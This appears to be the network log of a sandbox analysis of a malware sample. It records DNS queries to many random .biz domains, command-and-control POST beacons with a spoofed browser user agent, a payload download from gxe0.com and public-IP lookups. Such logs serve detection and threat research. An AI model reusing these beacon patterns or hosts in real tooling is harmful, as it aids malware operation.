Source: global traffic HTTP traffic detected: POST /tkvhoyj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dlynankz.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic HTTP traffic detected: POST /dafungtde HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oflybfv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic HTTP traffic detected: POST /c HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mnjmhp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /tgphsmbcvwmuwmj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yhqqc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic HTTP traffic detected: POST /nnsajrfcymu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: opowhhece.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /dqxhnesyyna HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mnjmhp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic HTTP traffic detected: POST /b HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jdhhbs.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /ghhknbcvfb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: opowhhece.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic HTTP traffic detected: POST /met HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jdhhbs.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic HTTP traffic detected: POST /t HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mgmsclkyu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /qtbrykoecwonf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mgmsclkyu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic HTTP traffic detected: POST /apsbtqhunyqqv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: warkcdu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /kc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: warkcdu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic HTTP traffic detected: POST /pgnqnbmeojw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gcedd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /onutm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gcedd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic HTTP traffic detected: POST /rw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gcedd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /sjpfgfxfdnggnnio HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jwkoeoqns.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic HTTP traffic detected: POST /rntyad HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xccjj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic HTTP traffic detected: POST /vbngsfyw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jwkoeoqns.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /e HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xccjj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /isfkmckm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: hehckyov.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic HTTP traffic detected: POST /xc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: hehckyov.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /fwkhevjnywgrfjvo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: rynmcq.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic HTTP traffic detected: POST /qqnj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: rynmcq.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /yak2/233_Juqmtmyadyy HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: gxe0.com
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: gxe0.com
Source: global traffic DNS traffic detected: DNS query: pywolwnvd.biz
Source: global traffic DNS traffic detected: DNS query: ssbzmoy.biz
Source: global traffic DNS traffic detected: DNS query: api.ipify.org
Source: global traffic DNS traffic detected: DNS query: cvgrf.biz
Source: global traffic DNS traffic detected: DNS query: npukfztj.biz
Source: global traffic DNS traffic detected: DNS query: s82.gocheapweb.com
Source: global traffic DNS traffic detected: DNS query: przvgke.biz
Source: global traffic DNS traffic detected: DNS query: zlenh.biz
Source: global traffic DNS traffic detected: DNS query: knjghuig.biz
Source: global traffic DNS traffic detected: DNS query: uhxqin.biz
Source: global traffic DNS traffic detected: DNS query: anpmnmxo.biz
Source: global traffic DNS traffic detected: DNS query: lpuegx.biz
Source: global traffic DNS traffic detected: DNS query: vjaxhpbji.biz
Source: global traffic DNS traffic detected: DNS query: xlfhhhm.biz
Source: global traffic DNS traffic detected: DNS query: ifsaia.biz
Source: global traffic DNS traffic detected: DNS query: saytjshyf.biz
Source: global traffic DNS traffic detected: DNS query: vcddkls.biz
Source: global traffic DNS traffic detected: DNS query: fwiwk.biz
Source: global traffic DNS traffic detected: DNS query: tbjrpv.biz
Source: global traffic DNS traffic detected: DNS query: deoci.biz
Source: global traffic DNS traffic detected: DNS query: gytujflc.biz
Source: global traffic DNS traffic detected: DNS query: qaynky.biz
Source: global traffic DNS traffic detected: DNS query: bumxkqgxu.biz
Source: global traffic DNS traffic detected: DNS query: dwrqljrr.biz
Source: global traffic DNS traffic detected: DNS query: nqwjmb.biz
Source: global traffic DNS traffic detected: DNS query: ytctnunms.biz
Source: global traffic DNS traffic detected: DNS query: myups.biz
Source: global traffic DNS traffic detected: DNS query: oshhkdluh.biz
Source: global traffic DNS traffic detected: DNS query: yunalwv.biz
Source: global traffic DNS traffic detected: DNS query: jpskm.biz
Source: global traffic DNS traffic detected: DNS query: lrxdmhrr.biz
Source: global traffic DNS traffic detected: DNS query: wllvnzb.biz
Source: global traffic DNS traffic detected: DNS query: gnqgo.biz
Source: global traffic DNS traffic detected: DNS query: jhvzpcfg.biz
Source: global traffic DNS traffic detected: DNS query: acwjcqqv.biz
Source: global traffic DNS traffic detected: DNS query: lejtdj.biz
Source: global traffic DNS traffic detected: DNS query: vyome.biz
Source: global traffic DNS traffic detected: DNS query: yauexmxk.biz
Source: global traffic DNS traffic detected: DNS query: iuzpxe.biz
Source: global traffic DNS traffic detected: DNS query: sxmiywsfv.biz
Source: global traffic DNS traffic detected: DNS query: vrrazpdh.biz
Source: global traffic DNS traffic detected: DNS query: ftxlah.biz
Source: global traffic DNS traffic detected: DNS query: typgfhb.biz
Source: global traffic DNS traffic detected: DNS query: esuzf.biz
Source: global traffic DNS traffic detected: DNS query: gvijgjwkh.biz
Source: global traffic DNS traffic detected: DNS query: qpnczch.biz
Source: global traffic DNS traffic detected: DNS query: brsua.biz
Source: global traffic DNS traffic detected: DNS query: dlynankz.biz
Source: global traffic DNS traffic detected: DNS query: oflybfv.biz
Source: global traffic DNS traffic detected: DNS query: yhqqc.biz
Source: global traffic DNS traffic detected: DNS query: mnjmhp.biz
Source: global traffic DNS traffic detected: DNS query: opowhhece.biz
Source: global traffic DNS traffic detected: DNS query: zjbpaao.biz
Source: global traffic DNS traffic detected: DNS query: jdhhbs.biz
Source: global traffic DNS traffic detected: DNS query: mgmsclkyu.biz
Source: global traffic DNS traffic detected: DNS query: warkcdu.biz
Source: global traffic DNS traffic detected: DNS query: gcedd.biz
Source: global traffic DNS traffic detected: DNS query: jwkoeoqns.biz
Source: global traffic DNS traffic detected: DNS query: xccjj.biz
Source: global traffic DNS traffic detected: DNS query: hehckyov.biz
Source: global traffic DNS traffic detected: DNS query: rynmcq.biz
Source: global traffic DNS traffic detected: DNS query: uaafd.biz
Source: unknown HTTP traffic detected: POST /omhtttbpfwdopn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 836
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 26 Nov 2024 07:14:43 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 26 Nov 2024 07:14:44 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 26 Nov 2024 07:14:55 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
